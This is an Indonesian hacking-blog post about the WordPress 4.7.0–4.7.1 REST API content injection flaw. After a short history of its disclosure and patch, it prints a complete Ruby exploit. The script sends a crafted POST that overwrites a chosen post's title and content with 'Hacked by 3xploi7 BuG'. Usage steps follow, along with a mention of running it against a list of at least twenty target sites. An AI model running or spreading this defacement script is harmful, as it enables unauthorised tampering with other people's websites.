Exploit WordPress 4.7.0 - 4.7.1 Content Injection


Exploit WordPress 4.7.0 - 4.7.1 Content Injection - Hello 3xploi7er, udah lama nih kita tidak membahas exploit. Pada artikel yang berjudul Exploit WordPress 4.7.0 - 4.7.1 Content Injection kita akan membahas exploit teranyar ini.

Securi Firewall setelah menang uji beberapa kerentanan WAF saat Menguji Wordpress securi menemukan sebuah bug pada rest api. Kerentanan ini memungkinkan user yang tidak mempunyai hak, dapat mengubah isi dari judul dan isi artikel.

Setelah menemukan hal itu securi langsung mengungkapkan kepada tim keamanan Wordpress dan langsung ditangkap dengan baik. Mereka berdua mengkoordinasi hal tersebut dan langsung ditambal oleh pihak Wordpress Sebelum menjadi mangsa para hacker.

Perbaikan bug ini telah dilakukan Dan sekarang sudah diperbaiki pada versi 4.7.2.

Privilege Escalation ini pada awalnya di aktifkan secara default di versi 4.7.0. Salah satu REST ini memungkinan melihat, mengedit, menghapus & membuat posting. Dalam kondisi tertentu bisa saja pengunjung lain dapat menggunakan fitur ini.

Hal inilah yang di khawatirkan oleh wordpress.

==================================================================

# Exploit Title: WP Content Injection
# Date: 31 Jan' 2017
# Exploit Author: Harsh Jaiswal
# Vendor Homepage: http://wordpress.org
# Version: Wordpress 4.7 - 4.7.1 (Patched in 4.7.2)
# Tested on: Backbox ubuntu Linux
# Based on https://blog.sucuri.net/2017/02/content-injection-vulnerability-wordpress-rest-api.html
# Credits : Marc, Sucuri, Brute
# usage : gem install rest-client
# Lang : Ruby

require 'rest-client'
require 'json'
puts "Enter Target URI (With wp directory)"
targeturi = gets.chomp
puts "Enter Post ID"
postid = gets.chomp.to_i
response = RestClient.post(
  "#{targeturi}/index.php/wp-json/wp/v2/posts/#{postid}",
  {
    "id" => "#{postid}justrawdata",
    "title" => "Hacked by 3xploi7 BuG",
    "content" => " Hacked by 3xploi7 BuG, please update your wordpress version"
  }.to_json,
  :content_type => :json,
  :accept => :json
) {|response, request, result| response }
if(response.code == 200)
puts "Done! '#{targeturi}/index.php?p=#{postid}'"

else
puts "This site is not Vulnerable"
end

Tuts :
1. Instal Ruby on Rails.
2. Run : Ruby 3x.rb

Bash Version 
By Index Php


*Minimum 20 Site in list target
3xploi7 BuG Team 
/
Securi. Net

Share this:

ABOUT THE AUTHOR

Ceyron Louis

Hello We are OddThemes, Our name came from the fact that we are UNIQUE. We specialize in designing premium looking fully customizable highly responsive blogger templates. We at OddThemes do carry a philosophy that: Nothing Is Impossible

    Blogger Comment
    Facebook Comment

0 komentar:

Posting Komentar

Arsip Blog